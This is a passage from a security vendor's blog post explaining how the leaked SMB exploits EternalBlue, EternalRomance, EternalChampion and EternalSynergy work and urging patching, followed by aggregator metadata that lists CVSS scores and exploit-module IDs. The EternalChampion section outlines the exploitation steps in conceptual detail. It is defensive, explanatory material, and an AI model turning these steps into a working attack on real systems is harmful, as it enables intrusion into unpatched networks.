There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)\u2014nothing has appeared yet in the wild.\n\nAll these exploits were leaked by the [ShadowBrokers](<https://blog.malwarebytes.com/cybercrime/2017/04/shadowbrokers-fails-to-collect-1m-bitcoins-releases-stolen-information/>) Group, who allegedly stole them from the NSA. Less than a month after ShadowBrokers published their \u201cfindings,\u201d the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.\n\nSince then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations\u2019 networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.\n\nLet\u2019s now take a closer, more technical look at each exploit and how they work.\n\n### EternalBlue\n\nA bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.\n\nA buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. 
In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.\n\n### EternalRomance\n\nEternal Romance is an RCE attack that exploits [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>) against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nAt the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn\u2019t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.\n\nIn other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.\n\nAfter the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\n### EternalChampion\n\nThe issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. 
A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers\u2019 advantage.\n\nMeanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.\n\nThis vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:\n\n * A primary transaction request that will immediately be executed.\n * A secondary transaction request that triggers the bug caused by the race condition.\n * Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.\n\nFirst, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.\n\nThe secondary transaction handler copies the secondary transaction request\u2019s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers\u2019 thread (as opposed to the expected pool buffer). 
This allows an attacker to write their data directly to the stack of another thread.\n\nThe attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler\u2019s thread, and results in the ability for Remote Code Execution.\n\n### EternalSynergy\n\nThe Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.\n\nThis means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.\n\n### EternalRocks\n\nLooking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).\n\n### **Prevention and** remediation\n\nDespite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.\n\nPatch your systems.\n\nThe Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the [Microsoft Security Bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>). 
This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.\n\nBy applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.\n\nIn addition, many cybersecurity solutions, including [Malwarebytes Endpoint Protection](<https://www.malwarebytes.com/business/endpointprotection/>), offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.\n\nFor example, Malwarebytes\u2019 anti-exploit module detected WannaCry as [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.\n\nIt is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences\u2014especially when SMB vulnerabilities allow infections to spread so quickly.\n\nDon\u2019t be one of those companies. 
Get protected and stay updated!\n\nThe post [How threat actors are using SMB vulnerabilities](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-12-14T17:47:19", "references": [{"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], 
"type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-12-14T17:47:19", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "a74a56a5e345261115c114933e68b9922818efaa8d678b7ba68a1e24cea5a221", "hashmap": [{"hash": "d9861566a7a3d91d8b7889de8f756560", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "618600407f489983189d0d992f1272e6", "key": "type"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "fab8a7a7f05c11614ecd38f9c0b5d170", "key": "href"}, {"hash": "f665a0244ee0bec3b35a68308d6d1c9d", "key": "reporter"}, {"hash": "a0c241a267e58716578a1cf1db23a7bf", "key": "description"}, {"hash": "dce6d600243a8c5294b0bb826c34eb2f", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": 
"dce6d600243a8c5294b0bb826c34eb2f", "key": "published"}], "history": [], "href": "https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/", "id": "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "immutableFields": [], "lastseen": "2018-12-14T17:47:19", "modified": "2018-12-14T16:00:00", "objectVersion": "1.5", "published": "2018-12-14T16:00:00", "references": [], "reporter": "Pieter Arntz", "title": "How threat actors are using SMB vulnerabilities", "type": "malwarebytes", "viewCount": 803}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2018-12-14T17:47:19"}], "viewCount": 948, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", 
"idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-12-14T17:47:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2018-12-14T17:47:19", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, 
"obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "a0c241a267e58716578a1cf1db23a7bf"}, {"key": "href", "hash": "fab8a7a7f05c11614ecd38f9c0b5d170"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dce6d600243a8c5294b0bb826c34eb2f"}, {"key": "published", "hash": "dce6d600243a8c5294b0bb826c34eb2f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f665a0244ee0bec3b35a68308d6d1c9d"}, {"key": "title", "hash": "d9861566a7a3d91d8b7889de8f756560"}, {"key": "type", "hash": "618600407f489983189d0d992f1272e6"}], "scheme": null}]}